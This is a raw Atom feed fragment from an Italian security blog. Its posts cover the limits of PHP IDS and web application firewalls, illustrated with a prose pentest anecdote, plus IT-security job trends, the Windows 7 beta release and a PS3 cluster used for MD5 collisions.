src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=AL8gun8fJbY:CqD2SV-vLGE:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/AL8gun8fJbY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5359302469430741895?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5359302469430741895?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/AL8gun8fJbY/sslstrip-sslsniff-ssl-sniffing.html" title="sslstrip - Nuovi attacchi ad SSL" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_-FDKJTRMHR0/ScJJvcxMCXI/AAAAAAAAACc/arijmC_WR9o/s72-c/sslsniff.jpg" height="72" width="72" /><feedburner:origLink>http://www.armandoromeo.com/2009/03/sslstrip-sslsniff-ssl-sniffing.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D04EQ3c_cSp7ImA9WxVUEUw.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-1335070285374014554</id><published>2009-03-15T03:33:00.000-07:00</published><updated>2009-03-15T04:18:22.949-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-03-15T04:18:22.949-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="auditing siti web" /><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><category scheme="http://www.blogger.com/atom/ns#" term="firewall" /><category scheme="http://www.blogger.com/atom/ns#" term="sicurezza informatica" /><category scheme="http://www.blogger.com/atom/ns#" term="ids" /><title>PHP IDS e Web Application firewall</title><content type="html">Non che sia un fan degli IDS o Firewall a livello applicazione per la protezione delle applicazioni web. Ma reputo&lt;a href="http://php-ids.org/"&gt; PHP IDS&lt;/a&gt; un progetto molto valido che va nella direzione di &lt;span style="font-weight: bold;"&gt;mitigare &lt;/span&gt;tutte quelle vulnerabilità di input validation ancora così comuni.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://php-ids.org/wp-content/themes/PHPIDS/images/phpids_logo.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 66px;" src="http://php-ids.org/wp-content/themes/PHPIDS/images/phpids_logo.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Parliamo di &lt;span style="font-weight: bold;"&gt;SQL injection, remote e local file inclusion, XSS, HTTP response splitting, cookie manipulation&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;PHP IDS è un progetto open source, scritto in PHP, ideato da &lt;a href="http://mario.heideri.ch/"&gt;Mario Heidrich&lt;/a&gt;, giunto alla versione 0.5.4, abbastanza stabile e in grado di assegnare uno score ad ogni payload ritenuto malevolo e comportarsi di conseguenza: è possibile bloccare la richiesta (a livello PHP, non di rete), fare un redirect o qualsiasi cosa si possa fare con PHP.&lt;br /&gt;&lt;br /&gt;La libreria PHP di PHP IDS viene inclusa in ogni pagina del sito web. La libreria andrà a valutare le variabili $_COOKIE, $_SERVER, $_POST, $_GET basandosi su delle signature aggiornate frequentemente e disponibili gratuitamente dal sito del progetto PHP IDS in formato xml.&lt;br /&gt;&lt;br /&gt;Il log delle attività è disponibile in formato txt, su email o su database.&lt;br /&gt;La natura open source permette l'adattamento e l'ampliamento verso qualsiasi tipo di utilizzo.&lt;br /&gt;&lt;br /&gt;L'overhead associato all'attività di controllo delle variabili è minimo per siti di medio piccole dimensioni (L'ho personalmente testato su Hackerscenter.com che conta una media di 14,000 richieste al giorno  senza nessun rallentamento).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Elencate le note positive, cosa c'è di sbagliato nell'approccio automatizzato basato su IDS/Firewall?&lt;/span&gt;&lt;br /&gt;Innanzi tutto, Web application firewall o IDS a livello applicazione in ambiente web (livello 7) non arriveranno &lt;span style="font-weight: bold;"&gt;mai&lt;/span&gt; ad essere il silver bullet per la sicurezza web come lo sono stati i loro corrispettivi a livello 3. (per un certo periodo)&lt;br /&gt;&lt;br /&gt;I Firewall di rete operando su protocolli  di rete standard sono molto efficaci nel riconoscimento delle minacce.&lt;br /&gt;&lt;br /&gt;L'ambiente web è un ambiente estremamente eterogeneo. Ogni applicazione ha una logica di funzionamento a se stante. &lt;span style="font-weight: bold;"&gt;Il controllo delle variabili di input utente è solo la punta dell'iceberg.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Vulnerabilità come CSRF, Http session fixation o logic flaws non potranno mai essere riconosciute con approcci Firewall.&lt;br /&gt;&lt;br /&gt;In uno dei miei ultimi penetration test, mi sono trovato ad analizzare un'applicazione web che faceva da client FTP per la trasmissione di file all'interno del pannello di controllo di un servizio di hosting.&lt;br /&gt;La vulnerabilità riscontrata era resa possibile dalla errata configurazione di IIS che non isolava le directory utente unita ad un logic flaw (che non è un baco nel software ma un modo errato di scrivere la propria applicazione).&lt;br /&gt;&lt;br /&gt;La cartella in cui si andava scrivere sul server veniva recuperata dal COOKIE.&lt;br /&gt;Modificando semplicemente l'userid all'interno del cookie era possibile operare su directory dedicate ad altri utenti. (Nota: Nessuna directory traversal)&lt;br /&gt;&lt;br /&gt;Il cliente aveva a disposizione una soluzione di &lt;span style="font-weight: bold;"&gt;Web application firewall&lt;/span&gt;, costata non poco, che andando alla ricerca di payload malevolo, non era in grado di rilevare un tale exploit visto che la richiesta generata era completamente priva di ogni tipo di attacco riconoscibile.&lt;br /&gt;&lt;br /&gt;Può sembrare un caso raro ma non lo è.&lt;br /&gt;Soluzioni basate su firewall, sono apprezzabili come risposta alle minacce a breve termine.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;La sicurezza di un applicazione web si raggiunge tenendo in conto la sicurezza del codice sin dalla progettazione dell'applicazione stessa o attraverso un analisi del codice sorgente a posteriori.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://dilbert.com/strips/comic/2009-03-15/" title="Dilbert.com"&gt;&lt;img style="width: 516px; height: 231px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/40000/4000/400/44417/44417.strip.sunday.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-1335070285374014554?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/5e_Fad8oYvqIt6algsXoTp2uedI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5e_Fad8oYvqIt6algsXoTp2uedI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/5e_Fad8oYvqIt6algsXoTp2uedI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5e_Fad8oYvqIt6algsXoTp2uedI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=wRfTZhYvy9E:tOsFNhIllT4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=wRfTZhYvy9E:tOsFNhIllT4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=wRfTZhYvy9E:tOsFNhIllT4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=wRfTZhYvy9E:tOsFNhIllT4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=wRfTZhYvy9E:tOsFNhIllT4:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=wRfTZhYvy9E:tOsFNhIllT4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=wRfTZhYvy9E:tOsFNhIllT4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=wRfTZhYvy9E:tOsFNhIllT4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/wRfTZhYvy9E" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1335070285374014554?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1335070285374014554?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/wRfTZhYvy9E/php-ids-e-web-application-firewall.html" title="PHP IDS e Web Application firewall" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2009/03/php-ids-e-web-application-firewall.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08AR3syfyp7ImA9WxVQGU8.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-6604805270181119619</id><published>2009-02-06T05:20:00.000-08:00</published><updated>2009-02-06T06:17:26.597-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-02-06T06:17:26.597-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="penetration testing" /><category scheme="http://www.blogger.com/atom/ns#" term="crisi" /><category scheme="http://www.blogger.com/atom/ns#" term="it security" /><title>La crisi dell'IT Security</title><content type="html">O dovremmo dire la crisi che non c'è stando al report di SANS Institute e Foote partners.&lt;br /&gt;&lt;br /&gt;I posti di lavoro nel settore dell'ICT Security sembrano essere i più sicuri secondo quanto emerso in un survey di  2,120 security executive di aziende con 10,000 - 40,000 dipendenti operanti in 16 diversi settori.&lt;br /&gt;&lt;br /&gt;I dati emersi sono:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;79% degli intervistati non prevede nessun licenziamento nel 2009&lt;/li&gt;&lt;li&gt;54% degli intervistati non prevede alcun aumento di personale&lt;/li&gt;&lt;li&gt;Solo il 3% prevede un taglio di personale&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Ma la cosa più importante che salta all'occhio è la variazione di mansioni ricoperte dal personale di IT Security. C'è un graduale passaggio a competenze più "hands on" come penetration testing, ethical hackingm computer forensics e hardening in generale.&lt;br /&gt;&lt;br /&gt;La causa si può ricondurre all'aumento dei data breach e al bisogno di soluzioni di sicurezza "veloci" e di immediata utilità.&lt;br /&gt;&lt;br /&gt;L'effetto è quello di operare meno in outsourcing e di più in-house.&lt;br /&gt;Ed è proprio riguardo all'andamento dei servizi di ICT Security che mi piacerebbe leggere un qualche report. E' in questi casi che la crisi si farà sentire maggiormente.&lt;br /&gt;&lt;br /&gt;Nonostante le prediche di ottimismo di chi non sa leggere le statistiche, chi opera nel settore dei servizi per la sicurezza tocca la crisi con mano.&lt;br /&gt;&lt;br /&gt;Dalla ricerca di SANS si calcola che gli stipendi, negli Stati Uniti, per il settore IT Security siano cresciuti quest'anno fino a toccare i $72,000 per personale con esperienza inferiore ai tre anni.&lt;br /&gt;Un budget per la sicurezza invariato ma reindirizzato verso i propri dipendenti in termini di corsi di formazione e aumento di stipendi determina comunque una crisi del settore per tutte quelle aziende specializzate che operano nel settore dei servizi.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ma ci sono anche implicazioni pratiche.&lt;br /&gt;Servizi come penetrationt testing o vulnerability assessment richiedono competenze tecniche specifiche che non si acquisiscono con corsi di aggiornamento semestrali  interni alle aziende (anche se fosse, 6 mesi nel settore della sicurezza possono essere un'enormità). Abbandonare l'outsourcing in favore del personale interno non è detto che sia una buona scelta. Soprattutto se si abbandona qualsiasi analisi del rischio in favore di soluzioni a breve termine che possano garantire la semplice sopravvivenza digitale.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Quanto tempo ci vuole per formare un penetration tester? (che da definizione dovrebbe essere esterno all'organizzazione) . Il semplice concetto di penetration tester in-house è un ossimoro.&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Il reengineering dei processi va fatto in un momento di stallo come quello attuale.&lt;br /&gt;Sopravvivere alla giornata è un lusso che non ci si può permettere tanto a lungo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://dilbert.com/strips/comic/2009-02-06/" title="Dilbert.com"&gt;&lt;img style="width: 460px; height: 143px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/40000/0000/500/40554/40554.strip.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-6604805270181119619?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/6cWovR2UeOeHSMJDCcguHAj21w0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6cWovR2UeOeHSMJDCcguHAj21w0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/6cWovR2UeOeHSMJDCcguHAj21w0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6cWovR2UeOeHSMJDCcguHAj21w0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=zAKeNZ_UfEc:tqJeK3yFOCw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=zAKeNZ_UfEc:tqJeK3yFOCw:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=zAKeNZ_UfEc:tqJeK3yFOCw:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=zAKeNZ_UfEc:tqJeK3yFOCw:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=zAKeNZ_UfEc:tqJeK3yFOCw:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=zAKeNZ_UfEc:tqJeK3yFOCw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=zAKeNZ_UfEc:tqJeK3yFOCw:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=zAKeNZ_UfEc:tqJeK3yFOCw:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/zAKeNZ_UfEc" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6604805270181119619?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6604805270181119619?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/zAKeNZ_UfEc/la-crisi-dellit-security.html" title="La crisi dell'IT Security" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2009/02/la-crisi-dellit-security.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUYFQ385eCp7ImA9WxVSFU4.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-6487742951704746886</id><published>2009-01-08T01:37:00.000-08:00</published><updated>2009-01-09T12:31:52.120-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-01-09T12:31:52.120-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="windows" /><title>Windows 7 beta gratuito</title><content type="html">E' di oggi la notizia della possibilità di &lt;span style="font-weight: bold;"&gt;scaricare Windows 7 beta 1 gratuitamente&lt;/span&gt; da  MSDN/Technet&lt;br /&gt;&lt;br /&gt;Le prime impressioni di chi lo ha provato sono di grande stabilità, velocità migliorata e maggiore controllo sul livello di sensibilità dell' UAC (il vero fiasco di Windows Vista).&lt;br /&gt;&lt;br /&gt;Il download della beta è disponibile &lt;a href="http://technet.microsoft.com/en-us/evalcenter/dd353205.aspx"&gt;qui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Nota: I download sono limitati a 2,5 milioni = pochissimi giorni&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.nirmaltv.com/wp-content/uploads/2008/06/windows-7-preview.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 415px; height: 311px;" src="http://www.nirmaltv.com/wp-content/uploads/2008/06/windows-7-preview.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-6487742951704746886?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/DF3PNLf0XIlAppO0R83obRrBRxE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DF3PNLf0XIlAppO0R83obRrBRxE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/DF3PNLf0XIlAppO0R83obRrBRxE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DF3PNLf0XIlAppO0R83obRrBRxE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=pdvqbWsFP-w:B4YE8eArrDg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=pdvqbWsFP-w:B4YE8eArrDg:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=pdvqbWsFP-w:B4YE8eArrDg:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=pdvqbWsFP-w:B4YE8eArrDg:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=pdvqbWsFP-w:B4YE8eArrDg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=pdvqbWsFP-w:B4YE8eArrDg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=pdvqbWsFP-w:B4YE8eArrDg:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=pdvqbWsFP-w:B4YE8eArrDg:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/pdvqbWsFP-w" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6487742951704746886?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6487742951704746886?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/pdvqbWsFP-w/windows-7-beta-gratuito.html" title="Windows 7 beta gratuito" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2009/01/windows-7-beta-gratuito.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0AARHw_cCp7ImA9WxVTFks.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-5892598875094725214</id><published>2008-12-30T11:33:00.000-08:00</published><updated>2008-12-30T11:35:45.248-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-30T11:35:45.248-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="certificati" /><category scheme="http://www.blogger.com/atom/ns#" term="md5" /><title>Babbo, voglio un cluster di PS3</title><content type="html">Le &lt;span style="font-weight: bold;"&gt;Play Station 3&lt;/span&gt; usate in parallelo per trovare le collisioni MD5 erano 200 e non 100.&lt;br /&gt;&lt;br /&gt;Eccole qui:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_-FDKJTRMHR0/SVp3xT6k1mI/AAAAAAAAABc/D8XaRy4eXo0/s1600-h/ps3cluster2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 300px; height: 400px;" src="http://2.bp.blogspot.com/_-FDKJTRMHR0/SVp3xT6k1mI/AAAAAAAAABc/D8XaRy4eXo0/s400/ps3cluster2.jpg" alt="" id="BLOGGER_PHOTO_ID_5285668801715951202" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-5892598875094725214?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/OYN_vYKqvmqepKDtsky6GaUJaPc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/OYN_vYKqvmqepKDtsky6GaUJaPc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/OYN_vYKqvmqepKDtsky6GaUJaPc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/OYN_vYKqvmqepKDtsky6GaUJaPc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=WyqzZbDa35A:e0JyRW7WY10:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=WyqzZbDa35A:e0JyRW7WY10:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=WyqzZbDa35A:e0JyRW7WY10:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=WyqzZbDa35A:e0JyRW7WY10:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=WyqzZbDa35A:e0JyRW7WY10:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=WyqzZbDa35A:e0JyRW7WY10:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=WyqzZbDa35A:e0JyRW7WY10:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=WyqzZbDa35A:e0JyRW7WY10:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
